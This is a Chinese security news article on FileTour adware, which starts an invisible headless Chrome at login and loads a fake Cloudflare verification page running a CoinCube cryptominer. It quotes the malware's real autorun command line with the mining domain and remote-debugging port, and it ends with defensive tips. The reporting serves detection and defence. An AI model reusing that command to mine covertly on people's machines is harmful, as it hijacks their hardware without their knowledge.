当前位置:主页>资 讯>安全动态>

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿

FileTour是一种广告软件,通常作为游戏和其他软件的破解或欺骗手段传播。这个软件包是界定于广告软件和PUP以及更危险的计算机感染类型(如密码窃取木马和矿工)之间,也因此而臭名昭著。



 

此广告软件包可以创建Windows自动运行,当用户登录到Windows时,它会自动启动Chrome并连接到浏览器内的挖掘页面。更糟糕的是,用户并不能直接发现这些操作。



 

用于启动Headless Chrome的命令行

用户登录Windows时用于启动Chrome的命令是:

  C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disable-gpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41.html?t=0.4

该命令将导致chrome以不可见的状态打开,无需GPU硬件加速,可以在端口9222上启用远程调试,并自动连接到https://de-mi-nis-ner2.info/cdn-41.html?t=0.4网页。

当浏览器在后台打开此页面时,它将执行嵌入式JavaScript,以启动CoinCube浏览器内矿工脚本。这会导致Chrome在任务管理器中激活高达70-80%的CPU利用率。



 

任务管理器显示Chrome CPU利用率

正如你所看到的,通过使用浏览器的矿工窗口,大多数人甚至不会注意到他们感染了任何东西。是的,他们的电脑可能会感觉很慢,有些甚至可能会检查任务管理器,并注意到Chrome的奇怪行为,但对于大多数用户而言,该矿工可以运行数天而不被检测到。

  浏览器挖矿页面页面假装为Cloudflare验证页面

虽然大多数人不会在正常浏览器窗口中实际查看正在打开的网站,但我当然会看一看。有趣的是,这个页面假装是一个Cloudflare反DDoS验证页面,要求访问者确认他们是人类。



 

假Cloudflare反DDoS验证页面

即使此页面看起来像合法的Cloudflare验证页面,单击此复选框也不会执行任何操作。此外,源代码清楚地显示CoinCube脚本正在加载,这不是Cloudflare正在做的事情。



 

显示CoinCube代码的来源

  保护用户免受浏览器内的矿工的侵害

挖矿软件正在成为一种流行病,而浏览器内置矿工的行为也会越来越猖獗。因此,用户通过安装防病毒软件来保护自己是非常重要的,这些防病毒软件可以检测浏览器何时连接到CoinCube等已知的挖掘服务。

不幸的是,新浏览器挖矿行为不断涌现,它已成为安全行业的重头戏。因此,您安装的软件可能无法检测与新的浏览器内矿工关联的网址或脚本。

要增加进一步的保护,您可以在Chrome中使用adblocker,这会阻止浏览器内挖掘脚本。此外,您还可以使用 CoinBlockerLists 网站下载与浏览器内挖掘相关的IP地址和域列表。

(责任编辑:安博涛)

分享到:

更多
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
  • 微笑/wx
  • 撇嘴/pz
  • 抓狂/zk
  • 流汗/lh
  • 大兵/db
  • 奋斗/fd
  • 疑问/yw
  • 晕/y
  • 偷笑/wx
  • 可爱/ka
  • 傲慢/am
  • 惊恐/jk
用户名: 验证码:点击我更换图片
资料下载专区
图文资讯

物联网对工厂环境安全监测的影响

物联网对工厂环境安全监测的影响

由于潜在环境灾害、人身危险与财产损失风险的增加,企业面对营运中断的风险也跟着提升...[详细]

DNS 劫持恶意软件 Roaming Mantis 升级,针

DNS 劫持恶意软件 Roaming Mantis 升级,针对全球 iOS、Android 和桌面用户

据外媒报道, 卡巴斯基实验室发现针对 Android 设备的路由器 的 DNS 劫持恶意软件 Roa...[详细]

Telegrab恶意软件可以获取Telegram的密码、

Telegrab恶意软件可以获取Telegram的密码、cookie及密钥文件

思科Talos研究人员发现了名为Telegrab的病毒,这个病毒会从telegram桌面版中窃取信息...[详细]

恶意软件的小伎俩,伪装成Cloudflare页面默

恶意软件的小伎俩,伪装成Cloudflare页面默默挖矿

FileTour是一种广告软件,通常作为游戏和其他软件的破解或欺骗手段传播。这个软件包是...[详细]

青少年手机监控应用程序 TeenSafe 泄露数以

青少年手机监控应用程序 TeenSafe 泄露数以万计的用户密码

据外媒Zdnet报道,青少年手机监控应用程序TeenSafe所使用的服务器泄漏了父母和孩子的...[详细]

返回首页 返回顶部